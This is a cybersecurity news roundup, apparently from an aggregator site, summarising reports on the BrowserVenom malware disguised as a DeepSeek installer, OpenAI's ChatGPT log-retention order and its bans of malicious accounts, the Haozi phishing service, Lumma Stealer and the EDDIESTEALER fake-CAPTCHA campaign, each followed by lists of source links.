CyberSecurity news

FlagThis - #users

Michael Kan@PCMag Middle East ai //
A new cyber threat has emerged, targeting users eager to experiment with the DeepSeek AI model. Cybercriminals are exploiting the popularity of open-source AI by disguising malware as a legitimate installer for DeepSeek-R1. Unsuspecting victims are unknowingly downloading "BrowserVenom" malware, a malicious program designed to steal stored credentials, session cookies, and gain access to cryptocurrency wallets. This sophisticated attack highlights the growing trend of cybercriminals leveraging interest in AI to distribute malware.

This attack vector involves malicious Google ads that redirect users to a fake DeepSeek domain when they search for "deepseek r1." The fraudulent website, designed to mimic the official DeepSeek page, prompts users to download a file named "AI_Launcher_1.21.exe." Once executed, the installer displays a fake installation screen while silently installing BrowserVenom in the background. Security experts at Kaspersky have traced the threat and identified that the malware reconfigures browsers to route traffic through a proxy server controlled by the hackers, enabling them to intercept sensitive data.

Kaspersky's investigation revealed that the BrowserVenom malware can evade many antivirus programs and has already infected computers in various countries, including Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The analysis of the phishing and distribution websites revealed Russian-language comments within the source code, suggesting the involvement of Russian-speaking threat actors. This incident serves as a reminder to verify the legitimacy of websites and software before downloading, especially when dealing with open-source AI tools that require multiple installation steps.

Recommended read:
References :
  • gbhackers.com: Threat Actors Exploit DeepSeek-R1 Popularity to Target Windows Device Users
  • PCMag Middle East ai: 'BrowserVenom' Windows Malware Preys on Users Looking to Run DeepSeek AI
  • bsky.app: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legit installer for DeepSeek Victims are unwittingly downloading the "BrowserVenom" malware designed to steal stored credentials, session cookies, etc and gain access to cryptocurrency wallets
  • The Register - Software: DeepSeek installer or just malware in disguise? Click around and find out
  • Malware ? Graham Cluley: Malware attack disguises itself as DeepSeek installer
  • Graham Cluley: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legitimate installer for DeepSeek.
  • Securelist: Toxic trend: Another malware threat targets DeepSeek
  • www.pcmag.com: Antivirus provider Kaspersky traces the threat to malicious Google ads.
  • www.techradar.com: Fake DeepSeek website found serving dangerous malware instead of the popular app.
  • www.microsoft.com: Rewriting SymCrypt in Rust to modernize Microsoft’s cryptographic library
  • ASEC: Warning Against Distribution of Malware Disguised as Research Papers (Kimsuky Group)
  • cyble.com: Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases

Pierluigi Paganini@securityaffairs.com //
OpenAI is facing scrutiny over its ChatGPT user logs due to a recent court order mandating the indefinite retention of all chat data, including deleted conversations. This directive stems from a lawsuit filed by The New York Times and other news organizations, who allege that ChatGPT has been used to generate copyrighted news articles. The plaintiffs believe that even deleted chats could contain evidence of infringing outputs. OpenAI, while complying with the order, is appealing the decision, citing concerns about user privacy and potential conflicts with data privacy regulations like the EU's GDPR. The company emphasizes that this retention policy does not affect ChatGPT Enterprise or ChatGPT Edu customers, nor users with a Zero Data Retention agreement.

Sam Altman, CEO of OpenAI, has advocated for what he terms "AI privilege," suggesting that interactions with AI should be afforded the same privacy protections as communications with professionals like lawyers or doctors. This stance comes as OpenAI faces criticism for not disclosing to users that deleted and temporary chat logs were being preserved since mid-May in response to the court order. Altman argues that retaining user chats compromises their privacy, which OpenAI considers a core principle. He fears that this legal precedent could lead to a future where all AI conversations are recorded and accessible, potentially chilling free expression and innovation.

In addition to privacy concerns, OpenAI has identified and addressed malicious campaigns leveraging ChatGPT for nefarious purposes. These activities include the creation of fake IT worker resumes, the dissemination of misinformation, and assistance in cyber operations. OpenAI has banned accounts linked to ten such campaigns, including those potentially associated with North Korean IT worker schemes, Beijing-backed cyber operatives, and Russian malware distributors. These malicious actors utilized ChatGPT to craft application materials, auto-generate resumes, and even develop multi-stage malware. OpenAI is actively working to combat these abuses and safeguard its platform from being exploited for malicious activities.

Recommended read:
References :
  • chatgptiseatingtheworld.com: After filing an objection with Judge Stein, OpenAI took to the court of public opinion to seek the reversal of Magistrate Judge Wang’s broad order requiring OpenAI to preserve all ChatGPT logs of people’s chats.
  • Reclaim The Net: Private prompts once thought ephemeral could now live forever, thanks for demands from the New York Times.
  • Digital Information World: If you’ve ever used ChatGPT’s temporary chat feature thinking your conversation would vanish after closing the window — well, it turns out that wasn’t exactly the case.
  • iHLS: AI Tools Exploited in Covert Influence and Cyber Ops, OpenAI Warns
  • Schneier on Security: Report on the Malicious Uses of AI
  • The Register - Security: ChatGPT used for evil: Fake IT worker resumes, misinfo, and cyber-op assist
  • Jon Greig: Russians are using ChatGPT to incrementally improve malware. Chinese groups are using it to mass create fake social media comments. North Koreans are using it to refine fake resumes is likely only catching a fraction of nation-state use
  • Jon Greig: Russians are using ChatGPT to incrementally improve malware. Chinese groups are using it to mass create fake social media comments. North Koreans are using it to refine fake resumes is likely only catching a fraction of nation-state use
  • Latest news: How global threat actors are weaponizing AI now, according to OpenAI
  • The Hacker News: OpenAI has revealed that it banned a set of ChatGPT accounts that were likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups to assist with malware development, social media automation, and research about U.S. satellite communications technologies, among other things.
  • securityaffairs.com: OpenAI bans ChatGPT accounts linked to Russian, Chinese cyber ops
  • therecord.media: Russians are using ChatGPT to incrementally improve malware. Chinese groups are using it to mass create fake social media comments. North Koreans are using it to refine fake resumes is likely only catching a fraction of nation-state use
  • siliconangle.com: OpenAI to retain deleted ChatGPT conversations following court order
  • eWEEK: ‘An Inappropriate Request’: OpenAI Appeals ChatGPT Data Retention Court Order in NYT Case
  • gbhackers.com: OpenAI Shuts Down ChatGPT Accounts Linked to Russian, Iranian & Chinese Cyber
  • Policy ? Ars Technica: OpenAI is retaining all ChatGPT logs “indefinitely.†Here’s who’s affected.
  • AI News | VentureBeat: Sam Altman calls for ‘AI privilege’ as OpenAI clarifies court order to retain temporary and deleted ChatGPT sessions
  • www.techradar.com: Sam Altman says AI chats should be as private as ‘talking to a lawyer or a doctor’, but OpenAI could soon be forced to keep your ChatGPT conversations forever
  • aithority.com: New Relic Report Shows OpenAI’s ChatGPT Dominates Among AI Developers
  • the-decoder.com: ChatGPT scams range from silly money-making ploys to calculated political meddling
  • hackread.com: OpenAI Shuts Down 10 Malicious AI Ops Linked to China, Russia, N. Korea
  • Tech Monitor: OpenAI highlights exploitative use of ChatGPT by Chinese entities

@gbhackers.com //
The Haozi Phishing-as-a-Service (PhaaS) platform has resurfaced, marking a concerning development in the cybercrime landscape. This Chinese-language operation distinguishes itself with its ease of use, comprehensive customer support, and a cartoon mouse mascot, lowering the barrier to entry for aspiring cybercriminals. Haozi provides a "plug-and-play" system, transforming complex phishing campaigns into point-and-click operations accessible to those with minimal technical expertise. The platform boasts a fully automated, web-based control panel, enabling users to manage multiple phishing campaigns, filter traffic, view stolen credentials, and fine-tune attack behavior.

Haozi's business model resembles legitimate software companies, offering a subscription plan and a-la-carte sales. Transactions are conducted using Tether (USDT), with the associated wallet having processed over $280,000 to date. The platform also monetizes the broader attack ecosystem by selling advertising space that connects buyers to third-party services such as SMS gateways. This allows Haozi to act as a middleman, generating revenue not only from phishing kits but also from ancillary services. According to reports, the Haozi platform immediately gained nearly 2,000 followers on Telegram after its initial community on the encrypted messaging app was dismantled.

What sets Haozi apart is its fully automated installation process. Attackers simply input their server credentials into a hosted installation page, and the system automatically deploys a phishing site and admin dashboard, eliminating the need for command-line setup or server configuration. The kits themselves simulate real user experiences, with phishing templates mimicking bank verification and credit card prompts with response logic. For example, after capturing credit card details, the operator may decide to request a 2FA code based on the response received from a card transaction attempt. The resurgence of Haozi highlights the escalating threat presented by PhaaS networks and underscores the need for intensified cybersecurity training programs.

Recommended read:
References :
  • cyberpress.org: Haozi’s Plug-and-Play Phishing Attack Nets Over $280,000 from Victims
  • securityonline.info: Haozi Returns: The Phishing-as-a-Service Platform Making Cybercrime Easy
  • gbhackers.com: Haozi’s Plug-and-Play Phishing Attack Steals Over $280,000 From Users
  • www.scworld.com: Activity of Haozi phishing service surging, report finds

Nick Lucchesi@laptopmag.com //
OpenAI is planning to evolve ChatGPT into a "super-assistant" that understands users deeply and becomes their primary interface to the internet. A leaked internal document, titled "ChatGPT: H1 2025 Strategy," reveals that the company envisions ChatGPT as an "entity" that users rely on for a vast range of tasks, seamlessly integrated into various aspects of their daily lives. This includes tasks like answering questions, finding a home, contacting a lawyer, planning vacations, managing calendars, and sending emails, all aimed at making life easier for the user.

The document, dated in late 2024, describes the "super-assistant" as possessing "T-shaped skills," meaning it has broad capabilities for tedious daily tasks and deep expertise for more complex tasks like coding. OpenAI aims to make ChatGPT personalized and available across various platforms, including its website, native apps, phones, email, and even third-party surfaces like Siri. The goal is for ChatGPT to act as a smart, trustworthy, and emotionally intelligent assistant capable of handling any task a person with a computer could do.

While the first half of 2025 was focused on building ChatGPT as a "super assistant", plans are now shifting to generating "enough monetizable demand to pursue these new models." OpenAI sees ChatGPT less as a tool and more as a companion for surfing the web, helping with everything from taking meeting notes and preparing presentations to catching up with friends and finding the best restaurant. The company's vision is for ChatGPT to be an integral part of users' lives, accessible no matter where they are.

Recommended read:
References :
  • www.laptopmag.com: An internal OpenAI doc reveals exactly how ChatGPT may become your "super-assistant" very soon.
  • www.tomsguide.com: ChatGPT future just revealed — get ready for a ‘super assistant’
  • Dataconomy: A recently released internal document reveals OpenAI’s strategy to evolve ChatGPT into a “super-assistant” by the first half of 2025.
  • Latest news: Starting in the first half of 2026, OpenAI plans to evolve ChatGPT into a super assistant that knows you, understands what you care about, and can help with virtually any task.
  • 9to5mac.com: ChatGPT for Mac now records meetings and can answer questions about your cloud files, highlighting further integration of OpenAI's tools into users' workflows.
  • learn.aisingapore.org: OpenAI's ChatGPT is evolving into a comprehensive assistant, with memory retention for free users, integrated with cloud files and recording meetings.
  • Shelly Palmer: ChatGPT Just Got into Your Google Drive and Dropbox, Too
  • Maginative: ChatGPT Can Now Search Your Files, Emails, and Meeting Notes

@blog.checkpoint.com //
Microsoft has revealed that Lumma Stealer malware has infected over 394,000 Windows computers across the globe. This data-stealing malware has been actively employed by financially motivated threat actors targeting various industries. Microsoft Threat Intelligence has been tracking the growth and increasing sophistication of Lumma Stealer for over a year, highlighting its persistent threat in the cyber landscape. The malware is designed to harvest sensitive information from infected systems, posing a significant risk to users and organizations alike.

Microsoft, in collaboration with industry partners and international law enforcement, has taken action to disrupt the infrastructure supporting Lumma Stealer. However, the developers behind the malware are reportedly making significant efforts to restore servers and bring the operation back online, indicating the tenacity of the threat. Despite these efforts, security researchers note that the Lumma Stealer operation has suffered reputational damage, potentially making it harder to regain trust among cybercriminals.

In related news, a new Rust-based information stealer called EDDIESTEALER is actively spreading through fake CAPTCHA campaigns, using the ClickFix social engineering tactic to trick users into running malicious PowerShell scripts. EDDIESTEALER targets crypto wallets, browser data, and credentials, demonstrating a continued trend of malware developers utilizing Rust for its enhanced stealth and stability. These developments underscore the importance of vigilance and robust cybersecurity practices to protect against evolving malware threats.

Recommended read:
References :
  • www.microsoft.com: Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer
  • Catalin Cimpanu: Mastodon: The developers of the Lumma Stealer malware are making significant efforts to restore servers and return online.
  • blog.checkpoint.com: Lumma infostealer: Down but not out
  • community.emergingthreats.net: Summary: 46 new OPEN, 153 new PRO (46 + 107) Added rules: Open: 2062667 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (acoustpbns .run) (malware.rules)
  • Catalin Cimpanu: -New npm and PyPI malware (of course) -New DataCarry ransomware gang -Lumma Stealer infrastructure is returning online -Haozi PhaaS returns -T-Rex cryptominer infects South Korean internet cafes -Profiles on Ukrainian hacker group BO Team and Russian cyber unit GRU Unit 29155

@securityonline.info //
Elastic Security Labs has identified a new information stealer called EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. These campaigns trick users into executing malicious PowerShell scripts, which then deploy the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and employs the ClickFix social engineering tactic, luring unsuspecting individuals with the promise of CAPTCHA verification. The malware aims to harvest sensitive data, including credentials, browser information, and cryptocurrency wallet details.

This attack chain begins with threat actors compromising legitimate websites, injecting malicious JavaScript payloads that present bogus CAPTCHA check pages. Users are instructed to copy and paste a PowerShell command into their Windows terminal as verification, which retrieves and executes a JavaScript file called gverify.js. This script, in turn, fetches the EDDIESTEALER binary from a remote server, saving it in the downloads folder with a pseudorandom filename. The malware dynamically retrieves configuration data from a command-and-control server, allowing it to adapt its behavior and target specific programs.

EDDIESTEALER is designed to gather system metadata and siphon data of interest from infected hosts, including cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps like Telegram. The malware incorporates string encryption, a custom WinAPI lookup mechanism, and a mutex to prevent multiple instances from running. It also includes anti-sandbox checks and a self-deletion technique using NTFS Alternate Data Streams to evade detection. The dynamic C2 tasking gives attackers flexibility, highlighting the ongoing threat of ClickFix campaigns and the increasing use of Rust in malware development.

Recommended read:
References :
  • Virus Bulletin: Elastic Security Labs has uncovered a novel Rust-based infostealer distributed via Fake CAPTCHA campaigns that trick users into executing a malicious PowerShell script. EDDIESTEALER is hosted on multiple adversary-controlled web properties.
  • The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
  • www.scworld.com: ClickFix used to spread novel Rust-based infostealer
  • Anonymous ???????? :af:: “Prove you're not a robot†— turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix—a social engineering trick abusing PowerShell on Windows , ,
  • securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
  • malware.news: Cybersecurity researchers have identified a sophisticated malware campaign utilizing deceptive CAPTCHA interfaces to distribute EddieStealer, a Rust-based information stealing malware that targets sensitive user data across multiple platforms.
  • cyberpress.org: ClickFix Technique Used by Threat Actors to Spread EddieStealer Malware
  • gbhackers.com: Threat Actors Leverage ClickFix Technique to Deploy EddieStealer Malware